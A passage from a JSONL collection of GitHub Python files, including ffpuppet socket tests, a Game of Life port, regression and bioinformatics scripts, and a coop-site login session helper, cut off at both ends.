Bootstrapper.wait()\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_conn = mocker.Mock(spec_set=socket)\n fake_conn.recv.side_effect = recv\n fake_sock.accept.return_value = (fake_conn, None)\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper() as bts:\n bts.wait(lambda: True, url=redirect)\n assert fake_conn.close.call_count == closed\n assert fake_conn.recv.call_count == len(recv)\n assert fake_conn.sendall.call_count == 1\n\n\ndef test_bootstrapper_07():\n \"\"\"test Bootstrapper.wait() with a fake browser\"\"\"\n\n def _fake_browser(port, payload_size=5120):\n conn = socket()\n # 50 x 0.1 = 5 seconds\n conn.settimeout(0.1)\n # open connection\n for attempt in reversed(range(50)):\n try:\n conn.connect((\"127.0.0.1\", port))\n break\n except timeout:\n if not attempt:\n raise\n # send request and receive response\n try:\n conn.settimeout(10)\n conn.sendall(b\"A\" * payload_size)\n conn.send(b\"\")\n conn.recv(8192)\n finally:\n conn.close()\n\n with Bootstrapper() as bts:\n browser_thread = Thread(target=_fake_browser, args=(bts.port,))\n try:\n browser_thread.start()\n bts.wait(lambda: True, timeout=10)\n finally:\n browser_thread.join()\n\n\n@mark.parametrize(\n \"bind, attempts, raised\",\n [\n # failed to bind (OSError)\n ((OSError(0, \"foo1\"),), 1, LaunchError),\n # failed to bind (PermissionError) - multiple attempts\n (repeat(PermissionError(10013, \"foo2\"), 4), 4, LaunchError),\n ],\n)\ndef test_bootstrapper_08(mocker, bind, attempts, raised):\n \"\"\"test Bootstrapper() - failures\"\"\"\n mocker.patch(\"ffpuppet.bootstrapper.sleep\", autospec=True)\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.bind.side_effect = bind\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with raises(raised):\n with Bootstrapper(attempts=attempts):\n pass\n assert fake_sock.bind.call_count == attempts\n assert fake_sock.close.call_count == attempts\n\n\ndef test_bootstrapper_09(mocker):\n \"\"\"test Bootstrapper() - blocked ports\"\"\"\n fake_sock = mocker.MagicMock(spec_set=socket)\n fake_sock.getsockname.side_effect = (\n (None, Bootstrapper.BLOCKED_PORTS[0]),\n (None, 12345),\n )\n mocker.patch(\"ffpuppet.bootstrapper.socket.socket\", return_value=fake_sock)\n with Bootstrapper(attempts=2):\n pass\n assert fake_sock.close.call_count == 2\n","repo_name":"MozillaSecurity/ffpuppet","sub_path":"src/ffpuppet/test_bootstrapper.py","file_name":"test_bootstrapper.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"20290603785","text":"\"\"\"\nLIFE\n\nAn implementation of John Conway's popular cellular automaton\n\nPorted by Dave LeCompte\n\"\"\"\n\nfrom typing import Dict\n\nPAGE_WIDTH = 64\n\nMAX_WIDTH = 70\nMAX_HEIGHT = 24\n\n\ndef print_centered(msg) -> None:\n spaces = \" \" * ((PAGE_WIDTH - len(msg)) // 2)\n print(spaces + msg)\n\n\ndef print_header(title) -> None:\n print_centered(title)\n print_centered(\"CREATIVE COMPUTING MORRISTOWN, NEW JERSEY\")\n print()\n print()\n print()\n\n\ndef get_pattern() -> Dict[int, str]:\n print(\"ENTER YOUR PATTERN:\")\n c = 0\n\n pattern: Dict[int, str] = {}\n while True:\n line = input()\n if line == \"DONE\":\n return pattern\n\n # BASIC input would strip of leading whitespace.\n # Python input does not. The following allows you to start a\n # line with a dot to disable the whitespace stripping. This is\n # unnecessary for Python, but for historical accuracy, it's\n # staying in.\n\n if line[0] == \".\":\n line = \" \" + line[1:]\n pattern[c] = line\n c += 1\n\n\ndef main() -> None:\n print_header(\"LIFE\")\n\n pattern = get_pattern()\n\n pattern_height = len(pattern)\n pattern_width = 0\n for _line_num, line in pattern.items():\n pattern_width = max(pattern_width, len(line))\n\n min_x = 11 - pattern_height // 2\n min_y = 33 - pattern_width // 2\n max_x = MAX_HEIGHT - 1\n max_y = MAX_WIDTH - 1\n\n a = [[0 for y in range(MAX_WIDTH)] for x in range(MAX_HEIGHT)]\n p = 0\n g = 0\n invalid = False\n\n # line 140\n # transcribe the input pattern into the active array\n for x in range(0, pattern_height):\n for y in range(0, len(pattern[x])):\n if pattern[x][y] != \" \":\n a[min_x + x][min_y + y] = 1\n p += 1\n\n print()\n print()\n print()\n while True:\n if invalid:\n inv_str = \"INVALID!\"\n else:\n inv_str = \"\"\n\n print(f\"GENERATION: {g}\\tPOPULATION: {p} {inv_str}\")\n\n next_min_x = MAX_HEIGHT - 1\n next_min_y = MAX_WIDTH - 1\n next_max_x = 0\n next_max_y = 0\n\n p = 0\n g += 1\n for _ in range(min_x):\n print()\n\n for x in range(min_x, max_x + 1):\n print()\n line_list = [\" \"] * MAX_WIDTH\n for y in range(min_y, max_y + 1):\n if a[x][y] == 2:\n a[x][y] = 0\n continue\n elif a[x][y] == 3:\n a[x][y] = 1\n elif a[x][y] != 1:\n continue\n\n line_list[y] = \"*\"\n\n next_min_x = min(x, next_min_x)\n next_max_x = max(x, next_max_x)\n next_min_y = min(y, next_min_y)\n next_max_y = max(y, next_max_y)\n\n print(\"\".join(line_list))\n\n # line 295\n for _ in range(max_x + 1, MAX_HEIGHT):\n print()\n\n print()\n\n min_x = next_min_x\n max_x = next_max_x\n min_y = next_min_y\n max_y = next_max_y\n\n if min_x < 3:\n min_x = 3\n invalid = True\n if max_x > 22:\n max_x = 22\n invalid = True\n if min_y < 3:\n min_y = 3\n invalid = True\n if max_y > 68:\n max_y = 68\n invalid = True\n\n # line 309\n p = 0\n\n for x in range(min_x - 1, max_x + 2):\n for y in range(min_y - 1, max_y + 2):\n count = 0\n for i in range(x - 1, x + 2):\n for j in range(y - 1, y + 2):\n if a[i][j] == 1 or a[i][j] == 2:\n count += 1\n if a[x][y] == 0:\n if count == 3:\n a[x][y] = 3\n p += 1\n elif (count < 3) or (count > 4):\n a[x][y] = 2\n else:\n p += 1\n\n # line 635\n min_x = min_x - 1\n min_y = min_y - 1\n max_x = max_x + 1\n max_y = max_y + 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"coding-horror/basic-computer-games","sub_path":"55_Life/python/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":10601,"dataset":"github-code","pt":"44"} +{"seq_id":"12298320490","text":"from util import iterate_csv\nimport sys\n\ndef main():\n report = sys.argv[1]\n output_csv = sys.argv[2]\n\n output_lines = ['paper,assignment,email']\n for r in iterate_csv(report):\n valid, paper, email, reasons = r\n\n if valid=='x':\n output_lines.append(\"%s,conflict,%s\" %(paper, email))\n\n with open(output_csv,'w') as f:\n f.write('\\n'.join(output_lines))\n f.write('\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"mdrumond/pc-chair-kit","sub_path":"report_to_csv.py","file_name":"report_to_csv.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70340496774","text":"import pandas as pd\nimport glob\nimport sys\nimport re\nfrom pandas import DataFrame\n\n\n\nif sys.version_info[0] > 2:\n FG_id = input(\"Given the interesting taxon IDs you want to compare, should be separated by space >\")\n BG_id = input(\"Given the background taxon IDs or ignore it by press enter to use all rests as background >\")\n ext = input(\"Given the input file extension >\")\nelse:\n FG_id = raw_input(\"Given the interesting taxon IDs you want to compare, should be separated by space >\")\n BG_id = raw_input(\"Given the background taxon IDs or ignore it by press enter to use all rests as background >\")\n ext = raw_input(\"Given the input file extension >\")\n\nFG_list = FG_id.split()\nBG_list_user = BG_id.split()\n\"\"\"\nFG_id = 'ctx0001 ctx0002 ctx0009'\nFG_list = ['ctx0001', 'ctx0002', 'ctx0009']\next = 'fasta'\n\"\"\"\nignore_character = ['-','x','X','U','u','O','o','B','b','Z','z','J','j']\nAA_list = ['A','R','N','D','C','E','Q','G','H','I','L','K','M','F','P','S','T','W','Y','V','a','r','n','d','c','e','q','g','h','i','l','k','m','f','p','s','t','w','y','v']\nidentity_list = []\nfor file in glob.glob('./*'+ext):\n stander_ID = re.match(r'\\S*(ENS\\w{12})\\S*', file)\n if stander_ID is not None:\n geneid = stander_ID.group(1)\n else:\n geneid = file\n with open(file) as f:\n records = f.read()\n seq1 = records.split('>')[1:]\n seq2 = [seq.partition('\\n') for seq in seq1]\n seq3 = {seq[0].strip():seq[2].strip() for seq in seq2}\n all_taxon_list = list(seq3.keys())\n if len(BG_list_user) != 0:\n BG_list = BG_list_user\n else:\n BG_list = list(set(all_taxon_list).difference(set(FG_list)))\n seq_length = len(list(seq3.values())[0])\n# identity_sites = []\n for i in range(0,seq_length):\n FG_sites = []\n BG_sites = []\n for spf in FG_list:\n# if seq3[spf][i] != '-':\n FG_sites.append(seq3[spf][i])\n for spb in BG_list:\n# if seq3[spb][i] != '-':\n BG_sites.append(seq3[spb][i])\n if set(FG_sites).issubset(AA_list) and set(BG_sites) < set(AA_list) and len(set(FG_sites)) == 1 and len(set(FG_sites) & set(BG_sites)) == 0:\n identity_dict = {}\n identity_dict['Gene_ID'] = geneid\n identity_dict['FG_Taxons'] = FG_list\n identity_dict['BG_Taxons'] = BG_list\n identity_dict['FG_AA'] = FG_sites\n identity_dict['Position'] = i+1\n identity_dict['BG_AA'] = BG_sites\n if len(identity_dict) != 0:\n identity_list.append(identity_dict)\n\nif len(identity_list) != 0:\n identity_df = DataFrame(identity_list)\n# if not identity_df.empty:\n identity_df.set_index('Gene_ID').sort_index().to_csv('_'.join(FG_list)+\"identifity_info.csv\",header=True,index=True)\nelse:\n print(\"No identify sites were found at interesting taxons, you may want to try other taxons\")\n\n\nprint(identity_df)\n\n\n\n\n\n\"\"\"\nhttps://stackoverflow.com/questions/3844801/check-if-all-elements-in-a-list-are-identical\ndef checkEqual1(iterator):\n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\nOne-liner:\n\ndef checkEqual2(iterator):\n return len(set(iterator)) <= 1\nAlso one-liner:\n\ndef checkEqual3(lst):\n return lst[1:] == lst[:-1]\n\n# http://stackoverflow.com/q/3844948/\ndef checkEqualIvo(lst):\n return not lst or lst.count(lst[0]) == len(lst)\n\n# http://stackoverflow.com/q/3844931/\ndef checkEqual6502(lst):\n return not lst or [lst[0]]*len(lst) == lst\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"binlu1981/GenomicPips","sub_path":"find_identical_AA_position .py","file_name":"find_identical_AA_position .py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2446192806","text":"#!/bin/python\nimport numpy\nimport os\nimport os.path\nimport pickle\nfrom sklearn.cluster.k_means_ import KMeans\nfrom sklearn.mixture import GaussianMixture\nimport sklearn.mixture._gaussian_mixture\nimport sklearn.mixture\nimport sys\nimport scipy\n# Generate gmm features for videos; each video is represented by a single vector\n\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print (\"Usage: {0} gmm_model, cluster_num, file_list\".format(sys.argv[0]))\n print (\"gmm_model -- path to the gmm model\")\n print (\"cluster_num -- number of cluster\")\n print (\"file_list -- the list of videos\")\n exit(1)\n\n gmm_model = sys.argv[1]; file_list = sys.argv[3]\n cluster_num = int(sys.argv[2])\n\n # load the gmm model\n gmmx = pickle.load(open(gmm_model, 'rb'))\n \n \n files = open(file_list, \"r\")\n \n \n out_file = '/home/ubuntu/multimedia/11775-hws-master/hw1_code/soundnet16_gmm/50_features_soundnet16.gmm.npy'\n all_gmm = []\n \n for file in files:\n \tfile_name = '/home/ubuntu/multimedia/11775-hws-master/hw1_code/sound_net_16/'+file.strip()+ \"_16.npy\"\n \tprint(file_name)\n \tif os.path.isfile(file_name):\n \t x1 = numpy.load(file_name) \t\n\t\t\n \t gmmo = gmmx.predict(x1)\n \t\n \t hist, _ = numpy.histogram(gmmo, 50, density=False)\n \t\n \t hist = hist/numpy.sum(hist)\n \t\t \t\t\n \telse:\n \t hist = numpy.zeros((50,))\n \t\n \tall_gmm.append(hist)\n \t\n numpy.save(out_file, all_gmm)\n files.close()\n print (\"gmm features generated successfully!\")\n","repo_name":"ChetanMJ/Multi-Media-Event-Detection","sub_path":"MED_with_Audio_ASR/scripts/create_soundnet_gmm.py","file_name":"create_soundnet_gmm.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"2769030461","text":"from controlecartao import db\n\n\nclass Cartao(db.Model):\n def __init__(self, id=int, data=str, doc=int, tipo=str, valor=float):\n self.id = id\n self.data = data\n self.doc = doc\n self.tipo = tipo\n self.valor = valor\n\n def __repr__(self):\n return '' % self.name\n","repo_name":"RenanAmaro/controlecartao","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35390458797","text":"# Question: Given a SORTED 2D matrix and a search key, \n# find out if it exists in the matrix\n\n## Obviously we can do this trivially in O(M * N) time and O(1) space\n## Can we do better? Yeah! With binary_search\n\nclass Solution:\n def bin_search(self, lst, val, l, r):\n if r < l:\n return False \n mid = l + (r - l) // 2\n \n if lst[mid] == val:\n return True\n elif lst[mid] <= val:\n return self.bin_search(lst, val, mid+1, r)\n else:\n return self.bin_search(lst, val, l, mid -1)\n \n \n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n for lst in matrix:\n if self.bin_search(lst, target, 0, len(lst) - 1):\n return True\n return False\n\n### Getting index of the key should be \n# trivial from the above the solution above. We can just iterate\n# using row number and find the col number in binary_search.\n\n## Dead giveaway of bin_search -> sorted array\n\n## But since the whole thing is sorted, we can reduce the row \n# iteration to log M time. Skipping bin_search code here.\n\ndef searchMatrixBinary(matrix, target):\n for arr in matrix:\n if not len(arr):\n continue\n if arr[-1] > target:\n continue\n elif arr[0] > target:\n return False\n elif arr[0] <= target and arr[-1] >= target:\n return binary_search(arr, 0, len(arr) - 1)","repo_name":"raopg/algorithm-solutions","sub_path":"Python/2d_matrix_search.py","file_name":"2d_matrix_search.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70950455493","text":"import requests\nimport shelve\nimport logging\nimport datetime\n\nfrom bs4 import BeautifulSoup\nfrom typing import List, Optional, Type\nfrom types import TracebackType\n\nfrom url_constants import BASE_URL, LOGIN_URL, CSRF_KEY, SHIFTS_URL, EXTRA_DATA_URL\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\n\n\nclass CoopSession:\n SESSION_KEY: str = \"shifter_session\"\n DB_PATH: str = \"/tmp/shifter_session_db\"\n TEXT_EVERY_SECS: int = 60 * 60 # 1 hour\n\n def __init__(self, keep_session_alive: bool, username: str, password: str) -> None:\n self.keep_session_alive: bool = keep_session_alive\n self.text_sent_timestamp: int = 0\n self.username: str = username\n self.password: str = password\n\n def __enter__(self) -> None:\n with shelve.open(self.DB_PATH) as db:\n if self.SESSION_KEY not in db:\n logger.info(\"Creating new session\")\n self.session = requests.Session()\n self._login()\n else:\n session = db[self.SESSION_KEY]\n logger.info(\"Grabbed session from local DB\")\n if not self._does_session_still_work(session):\n logger.info(\"Session from DB does not work. Creating new one\")\n self.session = requests.Session()\n self._login()\n else:\n self.session = session\n logger.info(\"Session from DB still works\")\n\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> None:\n with shelve.open(self.DB_PATH) as db:\n if not self.keep_session_alive:\n if self.SESSION_KEY in db:\n del db[self.SESSION_KEY]\n self.session.close()\n else:\n db[self.SESSION_KEY] = self.session\n\n def _login(self) -> None:\n site = self.session.get(f\"{BASE_URL}{LOGIN_URL}\")\n bs_content = BeautifulSoup(site.content, \"html.parser\")\n token = bs_content.find(\"input\", {\"name\": CSRF_KEY})[\"value\"]\n login_data = {\n \"username\": self.username,\n \"password\": self.password,\n \"csrfmiddlewaretoken\": token,\n \"Submit\": \"Log In\",\n \"next\": \"\",\n }\n self.session.headers.update(\n {\n \"Referer\": \"https://members.foodcoop.com/services/login/\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Connection\": \"keep-alive\",\n }\n )\n login_resp = self.session.post(f\"{BASE_URL}{LOGIN_URL}\", login_data)\n logger.info(f\"Login status code response was: {login_resp.status_code}\")\n\n @classmethod\n def get_shifts_page_dom(cls, s: requests.Session, page: int) -> BeautifulSoup:\n today_date = datetime.date.today().strftime(\"%Y-%m-%d\")\n shifts_page = s.get(\n f\"{BASE_URL}{SHIFTS_URL}/{page}/{EXTRA_DATA_URL}{today_date}\"\n )\n return BeautifulSoup(shifts_page.content, \"html.parser\")\n\n @classmethod\n def _does_session_still_work(cls, s: requests.Session) -> bool:\n shifts_dom = cls.get_shifts_page_dom(s, 0)\n shift_text = shifts_dom.find(text=\"Shift Calendar\")\n return bool(shift_text)\n","repo_name":"jroth125/coop_shifter","sub_path":"src/coop_session.py","file_name":"coop_session.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"75188465733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 12 14:56:00 2022\n\nRetraining Models with the possibility of masking (lottery ticket)\n\n@author: YFGI6212\n\"\"\"\n\nimport sys\n\nsys.path.append(\"../\")\nsys.path.append(\"../../\")\n\n\nimport torch\n\nfrom models.cae_32x32x32_zero_pad_comp import CAE\nfrom models.masked_models import Masked_CAE\n\n\ndef load_projected_model(\n model_file=None, initial_model_file=None, projection=None, projection_params=None\n):\n \"\"\"\n model: typically the mest model of an experiment\n \n # Load the model\n 1 - load model \n # Project the model and generates the corresponding masks\n 2 - model2 = model.project(projection, projection_params)\n # Load the state of a second model (typically an initial model in model2\n # Model2 is then masked and can be retrained\n 3 - model2.state_dict() = initial_model.state_dict()\n # Apply the mask on the re-initialised weights of the model\n 4 - model2.apply_mask_on_layers()\n 4 - return the masked model2\n \"\"\"\n\n new_model = Masked_CAE()\n\n save_dict = torch.load(model_file, map_location=\"cpu\")\n\n new_model.load_state_dict(save_dict[\"model_state_dict\"])\n\n new_model.project(projection, projection_params) # create masks\n\n masks = new_model._masks\n\n save_dict = torch.load(initial_model_file, map_location=\"cpu\")\n\n new_model.load_state_dict(save_dict[\"model_state_dict\"])\n\n new_model._masks = masks\n new_model.apply_masks_on_layers()\n\n return new_model\n\n","repo_name":"CyprienGille/Sparse-Convolutional-AutoEncoder","sub_path":"functions/retrain_model.py","file_name":"retrain_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"361335199","text":"import psycopg2\nimport sys\nimport os\nimport csv\nimport datetime\nimport re\n\nconn = psycopg2.connect(\"dbname=school_crm user=postgres host=localhost port=5433\")\ncur = conn.cursor()\n\ncur.execute(\"DELETE from entry\")\ncur.execute(\"DELETE from section\")\ncur.execute(\"DELETE from chapter\")\ncur.execute(\"set client_encoding to 'latin1'\")\n\nchapter_id = None\nsection_id = None\nrule_content = \"\"\nrule_num = \"\"\nrule_title = \"\"\n\nfor line in open(sys.argv[1], 'r'):\n\tchapter_match = re.match(\"Section (\\d): (.*)\", line)\n\trule_match = re.match(\"\\d.(\\d\\d) (.*)\", line)\n\t\n\tif chapter_match or rule_match:\n\t\tif rule_num and rule_title and rule_content:\n\t\t\tcur.execute(\"INSERT into entry(num, title, section_id, content) VALUES (%s, %s, %s, %s)\", (\n\t\t\t\trule_num, rule_title, section_id, rule_content))\n\t\trule_num = rule_title = rule_content = \"\"\n\t\n\tif chapter_match:\n\t\tcur.execute(\"INSERT into chapter (num, title) VALUES (%s, %s) returning id\", (\n\t\t\tchapter_match.group(1) + \"0\", chapter_match.group(2)))\n\t\tchapter_id = int(cur.fetchone()[0])\n\t\t\n\t\tcur.execute(\"INSERT into section(num, title, chapter_id) VALUES (%s, %s, %s) returning id\", (\n\t\t\t\"0\", \"All entries\", chapter_id))\n\t\tsection_id = int(cur.fetchone()[0])\n\t\t\n\telif rule_match:\t\n\t\trule_num = rule_match.group(1)\n\t\trule_title = rule_match.group(2)\n\telse:\n\t\trule_content += line\n\nconn.commit()\ncur.close()\nconn.close()\n","repo_name":"schmave/demschooltools","sub_path":"import_rule_book.py","file_name":"import_rule_book.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"673864870","text":"from sys import stdin\r\n\r\nn, k = map(int, stdin.readline().split())\r\nlevel_list = sorted([int(stdin.readline()) for _ in range(n)])\r\n\r\ndef available(remain_level, dest):\r\n for element in level_list:\r\n if element >= dest:\r\n break\r\n remain_level -= (dest - element)\r\n if remain_level < 0:\r\n return False\r\n return True\r\n\r\nleft, right, answer = level_list[0], level_list[0] + k, 0\r\n\r\nwhile left <= right:\r\n mid = (left + right) // 2\r\n if available(k, mid):\r\n answer = mid\r\n left = mid + 1\r\n else:\r\n right = mid - 1\r\nprint(answer)","repo_name":"WhalesBob/AlgorithmSolving","sub_path":"백준/Silver/16564. 히오스 프로게이머/히오스 프로게이머.py","file_name":"히오스 프로게이머.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29317146267","text":"import sys\nimport pandas as pd\nimport statsmodels.formula.api as smf\n\n\nrf, scorefile = sys.argv[1:]\n\ndm_phenos = pd.read_csv(\"../data/processed/gen3/whi_white_DM_phenos.txt\", sep=\" \")\n\nwhi_sample_to_subject = (pd.read_csv(\"../data/raw/whi/sample_info.txt\", sep=\"\\t\", skiprows=15)\n\t\t\t .rename({'SampleID': 'sampleID', 'SubjectID': 'subjID'}, axis=1)\n\t\t\t .filter(['sampleID', 'subjID']))\n\nscores = (pd.read_csv(scorefile, delim_whitespace=True)\n\t .rename({'IID': 'sampleID', 'SCORE': 'score'}, axis=1)\n\t .merge(whi_sample_to_subject, on=\"sampleID\")\n\t .merge(dm_phenos, on=\"subjID\"))\n\nscores = scores.assign(delta_bmi = lambda x: x.delta_bmi.clip(lower=-5, upper=5),\n\t\t delta_sbp = lambda x: x.delta_sbp.clip(lower=-30, upper=30),\n\t\t delta_glu = lambda x: x.delta_glu.clip(lower=-40, upper=40),\n\t\t delta_ldl = lambda x: x.delta_ldl.clip(lower=-60, upper=40),\n\t\t delta_tg = lambda x: x.delta_tg.clip(lower=-75, upper=75))\nprint(smf.ols(f'delta_{rf} ~ score', data=scores.query('dm_intervention == True')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score', data=scores.query('dm_intervention == True & delta_sfa < delta_sfa.quantile(0.5)')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score + baseline_{rf}', data=scores.query('dm_intervention == True')).fit().summary().tables[1])\nprint(smf.ols(f'delta_{rf} ~ score * dm_intervention', data=scores).fit().summary().tables[1])\n","repo_name":"kwesterman/whi-diet-response","sub_path":"scripts/archive/test_score_DM.py","file_name":"test_score_DM.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12482114824","text":"### !!!!!!!!!!!!!!!!!!! Do not delete this cell !!!!!!!!!!!!!!!!!!!\nimport os\nfrom tqdm import tqdm\nimport pickle\nimport time\nimport numpy as np\nfrom gfootball.env.wrappers import Simple115StateWrapper\n\n# Here we will write the pickle files\ndef prepare_npy_dataset_from_replay_files(replay_files, replay_files_path):\n obs_save_dir = '/home/ssk/Study/GRP/dataset/npy_files'\n # replay_files_path = 'dataset/replay_files'\n\n if not os.path.exists(obs_save_dir):\n os.mkdir(obs_save_dir)\n\n for replay in tqdm(replay_files):\n with open(os.path.join(replay_files_path, replay), 'rb') as pkl_file:\n episode_data = pickle.load(pkl_file)\n\n episode_no = replay.split('.')[0]\n episode = episode_data['observations']\n episode['active'] = episode_data['players'][0]['active']\n episode_length = 3002\n raw_obs = {}\n\n episode_dir = os.path.join(obs_save_dir, episode_no)\n if not os.path.exists(episode_dir):\n os.mkdir(episode_dir)\n\n for step in range(episode_length):\n for (key, item) in episode.items():\n raw_obs[key] = item[step]\n\n float115_frame = Simple115StateWrapper.convert_observation([raw_obs], True)[0].tolist()\n action = episode_data['players'][0]['action'][step]\n \n frame_name = episode_no+f'_{step}'\n if len(action) != 0:\n float115_frame.extend(action)\n fram_save_path = os.path.join(episode_dir, frame_name)\n np.save(fram_save_path, np.array(float115_frame))\n\n\n\nif __name__=='__main__':\n replay_files_path = 'dataset/replay_files'\n replay_files = sorted(os.listdir(replay_files_path))\n replay_files.pop(0)\n # replay_files = replay_files[0:1]\n print(f\"total replay files: {len(replay_files)}\")\n # replay_files = replay_files[0:1]\n\n start = time.perf_counter()\n prepare_npy_dataset_from_replay_files(replay_files, replay_files_path)\n end = time.perf_counter()\n\n print(f\"Total time needed to process {len(replay_files)}: {end-start}s\")\n print(f\"Time needed to process a single file: {(end-start)/len(replay_files)}s\")","repo_name":"siyamsajeebkhan/gr_football_analytics","sub_path":"utils/create_single_obs_files.py","file_name":"create_single_obs_files.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11891659830","text":"from sklearn import linear_model\nfrom sklearn.preprocessing import PolynomialFeatures\nimport pandas as pd\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n#Reading and spliting data into test and train\ndf = pd.read_csv(\"kc_house_data.csv\")\ntrain_data,test_data = train_test_split(df,train_size=0.8,random_state=3)\n\nfeatures = [ 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors',\n 'waterfront', 'view', 'condition', 'grade', 'sqft_above',\n 'sqft_basement', 'yr_built', 'yr_renovated', 'zipcode', 'lat', 'long',\n 'sqft_living15', 'sqft_lot15' ]\nX_train = np.array(train_data[features])\nY_train = np.array(train_data['price'])\n\nX_test = np.array(test_data[features])\nY_test = np.array(test_data['price'])\n\n\n#===============================Linear Models============================\n#Simple multiple linear regression\nlr = linear_model.LinearRegression()\n\n#Ridge Regression\nR_lr1 = linear_model.Ridge(alpha=1)\nR_lr2 = linear_model.Ridge(alpha=10)\n\n#Lasso Regression\nL_r1 = linear_model.Lasso(alpha=1)\nL_r2 = linear_model.Lasso(alpha=10)\n\n\n#Polynomial Regression\npolyfeat = PolynomialFeatures(degree=2)\nX_all_feat_poly = polyfeat.fit_transform(df[features])\nX_trainpoly = polyfeat.fit_transform(train_data[features])\nX_testpoly = polyfeat.fit_transform(test_data[features])\n\n\n#=========================Fitting==============================\nlr.fit(X_train,Y_train)\n\nR_lr1.fit(X_train,Y_train)\nR_lr2.fit(X_train,Y_train)\n\nL_r1.fit(X_train,Y_train)\nL_r2.fit(X_train,Y_train)\n\npoly = linear_model.LinearRegression().fit(X_trainpoly, train_data['price'])\n\n#======================prediction==================================\nlr_pred = lr.predict(X_test)\n\nR_lr1_pred = R_lr1.predict(X_test)\nR_lr2_pred = R_lr2.predict(X_test)\n\nL_r1_pred = L_r1.predict(X_test)\nL_r2_pred = L_r2.predict(X_test)\n\nPoly_pred = poly.predict(X_testpoly)\n\n#============================Model acuaracy============================\n#Multiple regression\nprint(\"Multiple regression\")\nlr_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,lr_pred)),'.3f'))\nprint(\"Mean squared error:\",lr_MSR)\nprint(\"\")\n\n#Ridge regression\nprint(\"Ridge regression\")\nR_lr1_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,R_lr1_pred)),'.3f'))\nprint(\"Mean squared error for alpha=1:\",R_lr1_MSR)\n\nR_lr2_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,R_lr2_pred)),'.3f'))\nprint(\"Mean squared error for alpha=100:\",R_lr2_MSR)\nprint(\"\")\n\n#Lasso regressio\nprint(\"Lasso regression\")\nL_r1_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,L_r1_pred)),'.3f'))\nprint(\"Mean squared error for alpha=1:\",L_r1_MSR)\n\nL_r2_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,L_r2_pred)),'.3f'))\nprint(\"Mean squared error for alpha=100:\",L_r2_MSR)\nprint(\"\")\n\n#Polynomial regression\nprint(\"Polynomial regression\")\nPoly_MSR = float(format(np.sqrt(metrics.mean_squared_error(Y_test,Poly_pred)),'.3f'))\nprint(\"Mean squared error for degree=2:\",Poly_MSR)\n","repo_name":"Thehunk1206/EDA-and-Regression-Analysis","sub_path":"Regression/Regression_analysis.py","file_name":"Regression_analysis.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23509070340","text":"import time\nfrom SerialHandler import *\nfrom MapHandler import *\nfrom HTTPHandler import *\n\nplotHost = '192.168.1.129'\nplotPort = '5000'\n\nserialHandler = SerialHandler()\nmapHandler = MapHandler()\nhttpHandler = HTTPHandler(plotHost, plotPort)\n\n# Center Distance 140 + or - 2\n\nwhile True:\n i = 50;\n while i < 231:\n # Measurement command test\n print(\"------------------------------\")\n print(\"Requesting measurement at angle of\", end=' ')\n print(i, end='')\n print(\"...\")\n distance = 